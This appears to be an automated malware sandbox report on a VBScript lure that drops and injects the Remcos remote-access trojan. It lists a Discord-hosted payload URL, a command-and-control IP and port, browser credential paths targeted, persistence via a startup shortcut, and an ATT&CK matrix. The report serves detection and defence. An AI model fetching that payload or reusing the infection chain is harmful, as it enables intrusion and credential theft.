                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7916, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0040B21B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \key3.db11_2_0040B335

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21Jump to behavior
                  Source: Yara matchFile source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2994921734.000000000239F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1850661302.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7908, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7916, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: cmd.exe11_2_00405042
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting
                  Valid Accounts11
                  Native API
                  221
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services12
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  11
                  Deobfuscate/Decode Files or Information
                  211
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol211
                  Input Capture
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  4
                  Obfuscated Files or Information
                  2
                  Credentials In Files
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  2
                  Registry Run Keys / Startup Folder
                  1
                  Windows Service
                  12
                  Software Packing
                  NTDS3
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell
                  Network Logon Script422
                  Process Injection
                  1
                  Timestomp
                  LSA Secrets33
                  System Information Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder
                  1
                  DLL Side-Loading
                  Cached Domain Credentials21
                  Security Software Discovery
                  VNCGUI Input Capture113
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Bypass User Account Control
                  DCSync31
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Masquerading
                  Proc Filesystem3
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation
                  Network Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd422
                  Process Injection
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574063 Sample: WO-663071 Sabiya Power Stat... Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 48 geoplugin.net 2->48 50 cdn.discordapp.com 2->50 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 9 other signatures 2->68 9 wscript.exe 17 2->9         started        14 wscript.exe 14 2->14         started        signatures3 process4 dnsIp5 56 cdn.discordapp.com 162.159.129.233, 443, 49730 CLOUDFLARENETUS United States 9->56 44 C:\Users\user\AppData\...\AutoRunScript.lnk, MS 9->44 dropped 46 C:\Temp\dddddd.ps1, ASCII 9->46 dropped 80 System process connects to network (likely due to code injection or exploit) 9->80 82 VBScript performs obfuscated calls to suspicious functions 9->82 84 Wscript starts Powershell (via cmd or directly) 9->84 86 2 other signatures 9->86 16 powershell.exe 13 9->16         started        20 powershell.exe 14->20         started        file6 signatures7 process8 file9 40 C:\Users\user\AppData\Local\Temp\x.exe, PE32 16->40 dropped 58 Found suspicious powershell code related to unpacking or dynamic code loading 16->58 60 Powershell drops PE file 16->60 22 x.exe 3 16->22         started        25 conhost.exe 16->25         started        27 x.exe 2 20->27         started        29 conhost.exe 20->29         started        signatures10 process11 signatures12 70 Antivirus detection for dropped file 22->70 72 Machine Learning detection for dropped file 22->72 74 Writes to foreign memory regions 22->74 31 aspnet_compiler.exe 22->31         started        34 aspnet_compiler.exe 3 15 22->34         started        76 Allocates memory in foreign processes 27->76 78 Injects a PE file into a foreign processes 27->78 38 aspnet_compiler.exe 27->38         started        process13 dnsIp14 88 Contains functionality to bypass UAC (CMSTPLUA) 31->88 90 Contains functionalty to change the wallpaper 31->90 92 Contains functionality to steal Chrome passwords or cookies 31->92 98 3 other signatures 31->98 52 162.251.122.87, 2404, 49731 UNREAL-SERVERSUS Canada 34->52 54 geoplugin.net 178.237.33.50, 49733, 80 ATOM86-ASATOM86NL Netherlands 34->54 42 C:\ProgramData\remcos\logs.dat, data 34->42 dropped 94 Detected Remcos RAT 34->94 96 Installs a global keyboard hook 34->96 file15 signatures16

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
                  C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://cdn.discord0%Avira URL Cloudsafe
                  https://cdn.discordapp0%Avira URL Cloudsafe
                  http://go.mic0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    high
                    cdn.discordapp.com
                    162.159.129.233
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gpfalse
                        high
                        https://cdn.discordapp.com/attachments/1295304757166080020/1316684745500790864/IGBO.ps1?ex=675bf1ba&is=675aa03a&hm=3e85baf94837620960229189756d21650fd643b90a2f7188dd60919d17e93238&false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1972857093.000001ED3B0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1856785002.000001ED2CB73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1920544621.000001F7AA322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1856785002.000001ED2C5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://geoplugin.net/json.gp:Taspnet_compiler.exe, 0000000A.00000002.2993408280.0000000000870000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1845746496.000001F79BD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1845746496.000001F79BD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.discordwscript.exe, 00000003.00000002.1970796959.000001AD771A5000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdn.discordapp.com/attachments/1295304757166080020/1316684745wscript.exe, wscript.exe, 00000003.00000002.1970895889.000001AD78C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1970895889.000001AD78C40000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cdn.discordapp.com/wscript.exe, 00000000.00000002.2006799938.00000226ED732000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.discordapp.com/attac77Cwscript.exe, 00000000.00000002.2006687133.00000226EB835000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1845746496.000001F79BD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://geoplugin.net/json.gpSystem32aspnet_compiler.exe, 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://go.micx.exe, 00000006.00000002.1851023746.0000000000B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://geoplugin.net/aspnet_compiler.exe, 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://geoplugin.net/json.gp/Cx.exe, 00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000002.1856200221.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000002.1856200221.0000000004E18000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cdn.discordapp.com/attac//wscript.exe, 00000003.00000002.1970796959.000001AD771A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.discordappwscript.exe, 00000000.00000002.2006687133.00000226EB835000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://geoplugin.net/json.gpfUaspnet_compiler.exe, 0000000A.00000002.2993408280.0000000000870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cdn.discordapp.com/attachments/1295304757166080020/1316684745500790864/IGBO.ps1?ex=675bf1ba&wscript.exe, 00000003.00000002.1970895889.000001AD78C42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1970079498.000001AD76E3C000.00000004.00000020.00020000.00000000.sdmp, WO-663071 Sabiya Power Station Project.vbsfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1972857093.000001ED3B0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1856785002.000001ED2CB73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1920544621.000001F7AA322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://oneget.orgXpowershell.exe, 00000001.00000002.1856785002.000001ED2C5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1856785002.000001ED2B071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79A2A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1856785002.000001ED2B071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79A2A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://oneget.orgpowershell.exe, 00000001.00000002.1856785002.000001ED2C5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        162.159.129.233
                                                                        cdn.discordapp.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        178.237.33.50
                                                                        geoplugin.netNetherlands
                                                                        8455ATOM86-ASATOM86NLfalse
                                                                        162.251.122.87
                                                                        unknownCanada
                                                                        64236UNREAL-SERVERSUStrue
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1574063
                                                                        Start date and time:2024-12-12 21:30:11 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 41s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:15
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:WO-663071 Sabiya Power Station Project.vbs
                                                                        Detection:MAL
                                                                        Classification:mal100.rans.troj.spyw.expl.evad.winVBS@18/12@2/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 60%
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 51
                                                                        • Number of non-executed functions: 187
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .vbs
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target aspnet_compiler.exe, PID 7908 because there are no executed function
                                                                        • Execution Graph export aborted for target powershell.exe, PID 7448 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: WO-663071 Sabiya Power Station Project.vbs
                                                                        TimeTypeDescription
                                                                        15:31:18API Interceptor12x Sleep call for process: powershell.exe modified
                                                                        15:31:51API Interceptor2174309x Sleep call for process: aspnet_compiler.exe modified
                                                                        20:31:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRunScript.lnk
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        162.159.129.233Cheat_Lab_2.7.2.msiGet hashmaliciousUnknownBrowse
                                                                        • cdn.discordapp.com/attachments/1175364766026436628/1175364839565176852/2
                                                                        Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                        • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                                                                        QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                                                                        SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                                                                        64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                                                                        • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                                        http://162.159.129.233Get hashmaliciousUnknownBrowse
                                                                        • 162.159.129.233/favicon.ico
                                                                        2lfV6QiE6j.exeGet hashmaliciousUnknownBrowse
                                                                        • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                                                                        SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousAmadeyBrowse
                                                                        • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                                                                        1PhgF7ujwW.exeGet hashmaliciousAmadeyBrowse
                                                                        • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                                                                        vhNyVU8USk.exeGet hashmaliciousAmadeyBrowse
                                                                        • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                                                                        178.237.33.504JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        cdn.discordapp.comsNifdpWiY9.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                                        • 162.159.134.233
                                                                        EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                        • 162.159.129.233
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.135.233
                                                                        file.exeGet hashmaliciousCStealerBrowse
                                                                        • 162.159.134.233
                                                                        https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                                                                        • 162.159.135.233
                                                                        SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                                                                        • 162.159.135.233
                                                                        segura.vbsGet hashmaliciousRemcosBrowse
                                                                        • 162.159.135.233
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 162.159.129.233
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                        • 162.159.134.233
                                                                        LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                                                        • 162.159.135.233
                                                                        geoplugin.net4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSltT8eZaqtZ.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                        • 172.67.216.167
                                                                        htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.206.64
                                                                        0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 172.67.185.252
                                                                        https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 104.21.112.1
                                                                        http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                        • 104.17.159.113
                                                                        https://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 104.18.20.58
                                                                        http://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 104.18.21.58
                                                                        https://morgans-proposal-site.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                        • 172.64.151.8
                                                                        https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.comGet hashmaliciousUnknownBrowse
                                                                        • 104.17.25.14
                                                                        https://link.edgepilot.com/s/f30932b1/vPPKRjWXhUuvPsJT0zGKsQ?u=https://lf7oxrhbb.cc.rs6.net/tn.jsp?f=001h06J4Rg18suvxSEI1tED4DAF8iRuyxY1F6LaYcn7sb4iX7GBolUHc7ee-KUx3ocXE9JkVShRAfV1x6aenzzKcDmVc2_grDROu5C380NMdm5zgykpeK24RW4ydxOZY-zzWGqXDAcSMsLIRx7mTviOEg==%26c=rtZvyEmdrWl6DZ9XsciJKGlh47UQUNn-J3NXlYUvzX0mHT2yPp0J7g==%26ch=pbMEYYEPfkmXeu_oUdJD2iMHpz6dLW5FEUtMz_fcwAIrF1HSqrYuCA==%26__=wp-admin/wp/2XWV/Dcndx/c3Njb3R0QGRjbmR4LmNvbQ=%3DGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                        • 104.18.11.207
                                                                        ATOM86-ASATOM86NL4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        VwiELrqQjD.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        SYSnyI8qDu.exeGet hashmaliciousRemcosBrowse
                                                                        • 178.237.33.50
                                                                        UNREAL-SERVERSUSRFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 212.162.149.89
                                                                        purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 212.162.149.66
                                                                        Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 212.162.149.66
                                                                        order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 212.162.149.89
                                                                        PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 212.162.149.89
                                                                        la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 162.251.123.175
                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                        • 212.162.149.48
                                                                        https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                                                        • 172.96.10.214
                                                                        scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 162.251.122.87
                                                                        1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 212.162.149.63
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        37f463bf4616ecd445d4a1937da06e190TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 162.159.129.233
                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                        • 162.159.129.233
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                        • 162.159.129.233
                                                                        510005940.docx.docGet hashmaliciousUnknownBrowse
                                                                        • 162.159.129.233
